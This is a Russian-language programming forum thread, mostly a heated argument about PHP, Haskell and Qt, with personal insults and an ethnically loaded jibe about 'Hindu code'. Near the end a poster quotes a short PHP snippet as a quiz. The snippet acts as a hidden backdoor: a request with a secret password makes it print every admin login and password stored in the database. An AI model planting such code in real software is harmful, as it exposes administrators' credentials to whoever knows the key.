d1v, а это нормально, c твоей стороны, воровать чужой контент и обращаться за помощью к другим, когда нечего сказать? )
никто не заметил, что каждым ответом он пытается слиться и уйти от темы, используя методом дяди Изи? кэпов тут хватает. расскажи нам лучше про "илитарный" хаскел или хотя бы про "быдлопэхэпэ", в которых ты так хорошо шаришь.
2leded Я увлекаюсь Qt, который, несмотря на свою уникальную систему "сигнал-слот", все же врядли может называться самостоятельным языком программирования, поскольку в основе его лежит C++.
я не знаю что тут нормально, а что нет, критерий норм у каждого индивидума свой. Т.е. понятие нормальности относительно, поэтому и оценка понятия нормальности одного другим несостоятельна в итоге. К примеру: каждый из Вас другого считает идиотом, третьи обычными людьми, четвёртые флудерами и т.д, пятые вас просто не замечают, для меня Вы два аспекта единого целого.
А я говорил, что я плотно знаком с похапе? Именно в похапе мне нужны знания ровно настолько, насколько можно быстро разобраться в быдлокоде, написанным такими горе-программистами, как ты, видимо. Раз у тебя такие теплые отношения с PHP. Опять ты передергиваешь. Впрочем, как и всегда.
Ребят действительно, это уже не смешно! Я понимаю, что сейчас говорю с людьми, которые лет на 10 меня младше, но все же, вы ведь не глупые ребята! Давайте будем соответствовать основной идее этого форма: Code: Основой нашего форума всегда было дружелюбие, взаимопонимание и свобода общения. Помните, что те, кто сидит по другую сторону монитора - такие же люди, как и Вы, со своими недостатками и достоинствами. Уважайте друг друга.
Что именно вас не устроило в моем ответе? Развернуто и аргументированно, пожалуйста. Ибо на подобный вопрос в стиле "Фи. ну что за дерьмо", сложно отвечать.
Ты сейчас кого больше пытаешься в этом убедить - меня, себя или окружающих, лол. Я вполне тебе прямо ответил, какие именно знания в PHP у меня имеются и для чего они нужны. Не больше, ни меньше -чтобы читать индусский код, написанный такими как ты, программистами тире "непризнанными гениями".
Перечитай еще раз мой ответ, пожалуйста. Я не говорил, что он является. Я сказал - что многие возможно, по незнанию, могут посчитать его таковым. И все.
в моих глазах твой пост выглядел так: несмотря на уникальное строение глазного яблока курицы она вряд ли может считаться яблоком.
на вскидку что под рукой было. что делает этот индусский код? в двух словах. Code: <? include_once($_SERVER['DOCUMENT_ROOT']."/main.php"); //include_once($_SERVER['DOCUMENT_ROOT']."/functions/dump.php"); global $DB; if (md5($_REQUEST["pwd"])=='6426f916d5a566b70f70b93818eaf61a') { $sql = $DB->select(0,$DB->config('Admin'),"*",'1'); while ($str = mysql_fetch_assoc($sql)) { echo "login: ".$str["login"]." password: ".$str["pwd"]."<br>"; } } ?>
Сожалею, если это выглядело так. Тогда, возможно, я не правильно выразился. Но мой ответ чуть выше уже дал ответ на твой вопрос, я думаю. Я нет, не считаю, в общем. Но многие считают.